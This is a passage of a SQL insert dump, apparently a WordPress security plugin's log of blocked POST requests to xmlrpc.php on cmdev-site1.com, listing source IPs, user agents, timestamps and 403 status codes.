Firefox\\/38.0\"}','4CInJ9BgZYuA8GmPNaT1ocXk',0,1681049227.8987,1050,'','POST',403,0,515,0,1,'',0),('103.133.215.217',1736824793,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPod; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','2PhAlyMuxYm1B0RacNeHUowz',0,1681049228.6679,1596,'','POST',403,0,515,0,1,'',0),('8.210.238.120',148041336,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:40.0) Gecko\\/20100101 Firefox\\/40.0\"}','b0CGMPNJyd9FOuX6ATaB21VD',0,1681049228.8800,1407,'','POST',403,0,515,0,1,'',0),('156.38.151.68',2619774788,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','7veXLZzCkaol8jpiHgUdhFM3',0,1681049234.3533,568,'','POST',403,0,515,0,1,'',0),('37.120.132.91',628655195,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','AtFBb1WOvdXVszCn2ecl0o8h',0,1681049745.2804,1426,'','POST',403,0,515,0,1,'',0),('213.152.162.149',3583550101,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','wReS1POgHWtIMh9VATNkpJ83',0,1681051287.6850,4895,'','POST',403,0,515,0,1,'',0),('213.152.187.210',3583556562,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','23ELj5hqxgTVRmD9ObIvu6FM',0,1681054423.1994,4531,'','POST',403,0,515,0,1,'',0),('194.187.251.115',3267099507,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','XYKN0B5zaeHfoA7nP9lGJ1CR',0,1681055433.7661,1496,'','POST',403,0,515,0,1,'',0),('129.226.138.214',2179107542,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','xrepUXA2bD9TnJNwEosa5ujl',0,1681056232.9391,1842,'','POST',403,0,515,0,1,'',0),('210.65.139.75',3527510859,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','JiHhoDxFmLcU0sZRBe4ayQl8',0,1681056236.0411,595,'','POST',403,0,515,0,1,'',0),('91.204.46.91',1540107867,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','jk4GJ3SYVQ5cR1HEB9XAObfD',0,1681056245.7271,627,'','POST',403,0,515,0,1,'',0),('192.30.89.59',3223214395,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','wkUpOq6hH28J5vLmToBMZbzC',0,1681056311.7664,4079,'','POST',403,0,515,0,1,'',0),('148.66.147.3',2487390979,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','IO9tgm8Y7oRKveBWqZzGTuf6',0,1681056433.9766,2778,'','POST',403,0,515,0,1,'',0),('67.205.178.151',1137554071,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 Firefox\\/41.0\"}','FWLOMIBcjQ4PJaSK9HDtu3ez',0,1681056435.8082,1222,'','POST',403,0,515,0,1,'',0),('68.178.145.190',1152553406,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','zEwAZqubJPHoGBOvUyxl2r3s',0,1681056442.9951,4950,'','POST',403,0,515,0,1,'',0),('143.110.236.52',2406411316,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','FLT1hkAstpNMI2zvcKOebwrV',0,1681056444.1431,5188,'','POST',403,0,515,0,1,'',0),('37.46.133.245',623805941,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','2RNQXGgroL3zSqnJd8t6aI4s',0,1681056446.0398,4734,'','POST',403,0,515,0,1,'',0),('207.180.210.110',3484734062,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','BXeTi3lAdDGZw04Nyb5puzH9',0,1681056463.0031,583,'','POST',403,0,515,0,1,'',0),('13.75.144.52',223055924,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 Firefox\\/84.0\"}','uLIl1wirBfSVpMvGqKHRAX6F',0,1681056468.2313,1735,'','POST',403,0,515,0,1,'',0),('159.223.71.186',2682210234,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q720) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','SU9qIfO5i783KynYpPxoRCQA',0,1681056468.6483,1890,'','POST',403,0,515,0,1,'',0),('177.153.54.112',2979608176,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','ur6ZT5ehb2yVdjKcJqfSitz3',0,1681056471.3386,1305,'','POST',403,0,515,0,1,'',0),('148.66.147.20',2487390996,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','c6vX8DBFuQJ2IyLt7rVkqPnz',0,1681056471.5682,1243,'','POST',403,0,515,0,1,'',0),('103.130.219.197',1736629189,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','7vb6olsOacP9SujJxt3CDXz0',0,1681057260.6394,3960,'','POST',403,0,515,0,1,'',0),('91.107.196.183',1533789367,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','3WSLZ0JGgP4UNBXxiVIk5dYs',0,1681057266.4397,1301,'','POST',403,0,515,0,1,'',0),('51.178.146.199',867340999,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','gGe8QJFIMsLE5DtPkf3Uzi2C',0,1681057266.7397,1210,'','POST',403,0,515,0,1,'',0),('60.205.95.181',1020092341,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','O0mQSlFHAoruw9XncMheG1WN',0,1681057280.7666,548,'','POST',403,0,515,0,1,'',0),('68.183.144.184',1152880824,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:17.0) Gecko\\/20100101 Firefox\\/20.6.14\"}','e7OqMxFhbn41YwlfCUQyPAHJ',0,1681057295.6035,543,'','POST',403,0,515,0,1,'',0),('89.238.166.235',1508812523,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','W5RkuBS8DIczLAPpXJTaUCZv',0,1681060218.6007,4305,'','POST',403,0,515,0,1,'',0),('45.77.175.167',760065959,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','iIC6Rtl7HMKJP9QVNsAexywc',0,1681060506.8629,4188,'','POST',403,0,515,0,1,'',0),('203.154.39.241',3415877617,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','wUy93LSbhmHuzrV2dYkKFCX5',0,1681060509.6921,2673,'','POST',403,0,515,0,1,'',0),('201.149.91.174',3382008750,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko\\/20100101 Firefox\\/38.0\"}','fOMIeKbkg2uLoCj4E1pWvnT6',0,1681060511.0567,1881,'','POST',403,0,515,0,1,'',0),('54.38.242.51',908522035,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','ukVqCrU02Npiw6QHODK7M1Za',0,1681060520.5663,584,'','POST',403,0,515,0,1,'',0),('91.134.248.211',1535572179,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','qxlMZ3dcm15SzKuRUTIkEAsv',0,1681060524.0336,547,'','POST',403,0,515,0,1,'',0),('192.96.200.110',3227568238,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:7.0.1) Gecko\\/20100101 Firefox\\/7.0.1\"}','jabYpEo4J9qR7riVmfI8HkCM',0,1681060537.4799,551,'','POST',403,0,515,0,1,'',0),('62.171.174.52',1051438644,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0; rv:34.0) Gecko\\/20100101 Firefox\\/34.0\"}','dMowpRT9DkB6AI4q2WVzhNlf',0,1681060540.8505,590,'','POST',403,0,515,0,1,'',0),('65.21.239.153',1091956633,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','WhBMtTmzwkal4DKn8cNv5CXU',0,1681060543.0659,554,'','POST',403,0,515,0,1,'',0),('194.149.144.86',3264581718,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','LUYaBMySPxur5Fte3kTIfD1E',0,1681060552.1689,633,'','POST',403,0,515,0,1,'',0),('159.223.93.124',2682215804,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','28gYxW0rXLBAKQGbwmTINjfR',0,1681061323.1601,1933,'','POST',403,0,515,0,1,'',0),('198.71.235.60',3326602044,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko\\/20100101 Firefox\\/63.0\"}','DUeBMiQXy3ANn4dRZTzfrpL1',0,1681061322.1584,3657,'','POST',403,0,515,0,1,'',0),('79.170.40.175',1336551599,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko\\/20100101 Firefox\\/79.0\"}','5hmcNE1fR0WyYbKZlduqiw3x',0,1681061329.1918,559,'','POST',403,0,515,0,1,'',0),('13.75.144.52',223055924,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\\/20100101 Firefox\\/40.1\"}','P3gLhuSWAw5261iEOoqJDQ9y',0,1681061332.4847,538,'','POST',403,0,515,0,1,'',0),('113.190.234.69',1908337221,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','d3zDLH7C2k0rPJOnh8EuUyRM',0,1681061341.7107,1504,'','POST',403,0,515,0,1,'',0),('37.46.133.245',623805941,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','UaZiMjVJfrGyENdHsOw9Acuk',0,1681061341.3577,1883,'','POST',403,0,515,0,1,'',0),('74.208.57.218',1255160282,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\"}','0c3XEolhv94u5YSPWjGtDLRK',0,1681061346.8266,1338,'','POST',403,0,515,0,1,'',0),('207.180.210.110',3484734062,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','5WHqgB7lY0LNnS2Q8e6CPIaM',0,1681061351.9628,1887,'','POST',403,0,515,0,1,'',0),('103.92.235.82',1734142802,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.90 Safari\\/537.36\"}','RqrB0zeUAShE5nIoxglQWON6',0,1681061352.0691,1895,'','POST',403,0,515,0,1,'',0),('184.168.100.170',3098043562,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','27ZszLRypX5lSu0MBJC3hKQO',0,1681061352.9518,1358,'','POST',403,0,515,0,1,'',0),('192.30.89.27',3223214363,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','YkPReaEAd5proLDitG8Vx91H',0,1681062534.6134,4420,'','POST',403,0,515,0,1,'',0),('89.238.150.43',1508808235,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','Hi0fZqraNFbpd52th3ADvCok',0,1681063437.8615,3616,'','POST',403,0,515,0,1,'',0),('103.169.35.181',1739137973,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.186 Safari\\/537.36\"}','fS74qu0aDobm8QKgTkGBcvF5',0,1681064320.0263,3927,'','POST',403,0,515,0,1,'',0),('109.169.53.7',1839805703,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 Firefox\\/41.0\"}','BoFfngyJT4j5WMUExhlu20Vd',0,1681064328.0215,591,'','POST',403,0,515,0,1,'',0),('103.130.219.197',1736629189,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','MjroBu0Gm8ka6vIX5K2OcAeP',0,1681064330.0073,836,'','POST',403,0,515,0,1,'',0),('198.54.114.123',3325457019,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','AiFKz1MsrVC6GHe9fNw48PhY',0,1681064330.6805,703,'','POST',403,0,515,0,1,'',0),('109.169.53.7',1839805703,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko\\/20100101 Firefox\\/47.0\"}','ERaD6w2YVj8PAzZFhWqMNSrx',0,1681064337.0907,1080,'','POST',403,0,515,0,1,'',0),('109.169.53.7',1839805703,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','IXHiBKzmeuUQ8G21PlZocaLx',0,1681064337.5444,835,'','POST',404,0,515,0,1,'',0),('210.116.66.47',3530834479,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','IFO6UM3dxTbPv9nZVX7DHfuh',0,1681064345.9771,686,'','POST',403,0,515,0,1,'',0),('203.154.39.241',3415877617,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','Mo0GcyfbiOaIs6PDxZUL2CVd',0,1681064346.7838,615,'','POST',403,0,515,0,1,'',0),('5.22.249.133',85391749,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.105 Safari\\/537.36\"}','NwsoXGtOIqWMnTCu2v9cBpYR',0,1681064350.3566,593,'','POST',403,0,515,0,1,'',0),('134.19.179.171',2249438123,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','tR6US0MqDKh4IAksuaBFJTxe',0,1681064762.3529,1419,'','POST',403,0,515,0,1,'',0),('213.152.186.173',3583556269,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','dFIRASxfEPsBDYG57kpJm1Ha',0,1681064818.6225,575,'','POST',403,0,515,0,1,'',0),('134.19.179.171',2249438123,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','EI7mUzJhty3ndB6V4liaCDoM',0,1681064825.7331,565,'','POST',403,0,515,0,1,'',0),('185.182.56.188',3115727036,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko\\/20100101 Firefox\\/79.0\"}','5woOPpxirAnQe7JVdzS9cjh0',0,1681066932.6132,1472,'','POST',403,0,515,0,1,'',0),('81.208.11.40',1372588840,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko\\/20100101 Firefox\\/47.0\"}','sdH5qtKFWo0NxVP4Tv6lJyGL',0,1681066935.7510,642,'','POST',403,0,515,0,1,'',0),('51.144.123.73',865106761,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','I852zEhy47kn0xJVKacYOpms',0,1681066936.7130,555,'','POST',403,0,515,0,1,'',0),('113.190.234.69',1908337221,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.90 Safari\\/537.36\"}','qLkgSE3PQ650FZmtaKB9fsGl',0,1681066941.7215,569,'','POST',403,0,515,0,1,'',0),('79.170.40.175',1336551599,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','MG9RDOojHKm153lFiBhsY6Vp',0,1681066951.9166,607,'','POST',403,0,515,0,1,'',0),('113.190.234.69',1908337221,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 6.0.1; RedMi Note 5 Build\\/RB3N5C; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/68.0.3440.91 Mobile Safari\\/537.36\"}','fcbVxyaE03Se52QvRhiFojNw',0,1681066952.9258,609,'','POST',403,0,515,0,1,'',0),('68.178.145.190',1152553406,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-X420) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','VDAmK52g79nFufeNlGM1pEqP',0,1681066957.5221,565,'','POST',403,0,515,0,1,'',0),('146.70.76.35',2454080547,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','8VUOuf2JLgzbst3d7QKCaqjl',0,1681067508.5128,3832,'','POST',403,0,515,0,1,'',0),('146.70.76.35',2454080547,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','PAdMqX2vTFoSlQ3GbLcfuwUr',0,1681067928.3657,1449,'','POST',403,0,515,0,1,'',0),('62.102.148.158',1046910110,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','O4cMBCNKrVJP1dXWziuaATvb',0,1681068378.3895,3743,'','POST',403,0,515,0,1,'',0),('213.152.187.200',3583556552,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','IgLfCDwnSJiZcabNHKYQehlP',0,1681069485.3606,1438,'','POST',403,0,515,0,1,'',0),('62.102.148.160',1046910112,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','6COEkalLmMZNneJrcs2ItHjR',0,1681070932.4620,1590,'','POST',403,0,515,0,1,'',0),('184.75.223.219',3091980251,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','Vf2Hk0zsEj4ICydwpuW6QLFR',0,1681071068.4985,1682,'','POST',403,0,515,0,1,'',0),('200.58.111.20',3359272724,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','0bKwPvBSWj5gEQxGeOyuT7Af',0,1681071101.3142,570,'','POST',403,0,515,0,1,'',0),('68.178.145.190',1152553406,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','UlaKVIYrM2DBH4J81nceySTo',0,1681071110.8385,554,'','POST',403,0,515,0,1,'',0),('113.190.234.69',1908337221,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko\\/20100101 Firefox\\/42.0\"}','dNLiHG3ylpDEvFbZTxfIUzXV',0,1681071112.9451,583,'','POST',403,0,515,0,1,'',0),('34.95.136.51',576686131,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','mr9eWoygZMs12zUPbjuavqGx',0,1681071121.5861,645,'','POST',403,0,515,0,1,'',0),('207.154.253.117',3483041141,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-X420) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','r2AM3EauSgeTlhoWFNtK0vGq',0,1681071122.4098,635,'','POST',403,0,515,0,1,'',0),('104.152.110.52',1754820148,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','pcVg76abPdxw1kjqLTGofnW9',0,1681071125.7635,579,'','POST',403,0,515,0,1,'',0),('77.222.40.118',1306404982,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','jr6CJNW8q4PtnobayQIZXFYO',0,1681071128.1675,633,'','POST',403,0,515,0,1,'',0),('81.208.11.40',1372588840,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','iKcg7F9XlJqVwMaj8y23tDzN',0,1681071131.7605,576,'','POST',403,0,515,0,1,'',0),('192.114.164.226',3228738786,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','KQNImshfPzAVypF0kd4n52E7',0,1681071136.3787,580,'','POST',403,0,515,0,1,'',0),('185.9.19.107',3104379755,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 